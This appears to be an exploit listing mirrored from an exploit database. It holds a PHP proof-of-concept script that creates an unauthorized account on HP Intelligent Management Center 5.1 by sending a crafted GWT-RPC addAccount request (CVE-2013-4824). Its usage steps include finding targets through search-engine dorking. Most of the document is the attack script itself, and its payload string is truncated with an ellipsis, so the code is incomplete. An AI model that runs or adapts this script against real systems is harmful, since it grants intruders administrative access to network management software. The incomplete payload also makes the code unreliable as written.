Share
## https://sploitus.com/exploit?id=PACKETSTORM:212158
=============================================================================================================================================
    | # Title     : HP Intelligent Management 5.1 E0201 Create a new account Vulnerability                                                      |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://buy.hpe.com/my/en/software/networking-software/intelligent-management-software/c/1009931441?selector=48             |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: Create a new account in HP Intelligent Management Center .
       
       (Related : https://packetstorm.news/files/id/180902/ Linked CVE numbers: CVE-2013-4824 ) .
    	
    [+] save code as poc.php.
    
    [+] Set taget : Line 19.
    
    [+] USage : php poc.php 
    
    [+] PayLoad :
    
    
    <?php
    
    function sendRequest($url, $data, $headers = [])
    {
        $ch = curl_init();
    
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    
        $response = curl_exec($ch);
        curl_close($ch);
    
        return $response;
    }
    
    $target = "http://victim-ip:8080"; // عدّل عنوان الهدف
    $username = "msf";
    $password = "p4ssw0rd";
    
    // الخطوة 1: الحصول على strong name للخدمة
    $response = sendRequest("$target/servicedesk/servicedesk/servicedesk.nocache.js", "", ["User-Agent: Mozilla/5.0"]);
    preg_match("/unflattenKeylistIntoAnswers\(\['default', 'safari'\], '([0-9A-Fa-f]+)'\);/", $response, $matches);
    $serviceDesk = $matches[1] ?? null;
    
    if (!$serviceDesk) {
        die("فشل في العثور على service desk strong name\n");
    }
    
    echo "Service Desk Strong Name: $serviceDesk\n";
    
    // الخطوة 2: الحصول على strong name لخدمة الحسابات
    $response = sendRequest("$target/servicedesk/servicedesk/{$serviceDesk}.cache.html", "", ["User-Agent: Mozilla/5.0"]);
    preg_match("/'accountSerivce.gwtsvc', '([0-9A-Fa-f]+)', SERIALIZER_1/", $response, $matches);
    $accountService = $matches[1] ?? null;
    
    if (!$accountService) {
        die("فشل في العثور على AccountService strong name\n");
    }
    
    echo "AccountService Strong Name: $accountService\n";
    
    // الخطوة 3: إرسال الطلب لإنشاء الحساب
    $payload = "6|0|39|http://localhost:8080/servicedesk/servicedesk/|$accountService|com.h3c.imc.eu.client.account.AccountService|addAccount|...";
    $data = [
        'method' => 'POST',
        'uri'    => '/servicedesk/servicedesk/accountSerivce.gwtsvc',
        'ctype'  => 'text/x-gwt-rpc; charset=UTF-8',
        'headers' => [
            "X-GWT-Module-Base: $target/servicedesk/servicedesk/",
            "X-GWT-Permutation: $serviceDesk"
        ],
        'data' => $payload
    ];
    
    $response = sendRequest("$target/servicedesk/servicedesk/accountSerivce.gwtsvc", $payload, [
        "Content-Type: text/x-gwt-rpc; charset=UTF-8",
        "X-GWT-Module-Base: $target/servicedesk/servicedesk/",
        "X-GWT-Permutation: $serviceDesk"
    ]);
    
    if (strpos($response, "already exists") !== false) {
        echo "المستخدم $username موجود بالفعل.\n";
    } elseif (strpos($response, "added successfully") !== false) {
        echo "تم إنشاء الحساب بنجاح: $username / $password\n";
        echo "قم بتسجيل الدخول من: $target/servicedesk/ServiceDesk.jsp\n";
    } else {
        echo "فشل في إنشاء الحساب.\n";
    }
    
    ?>
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================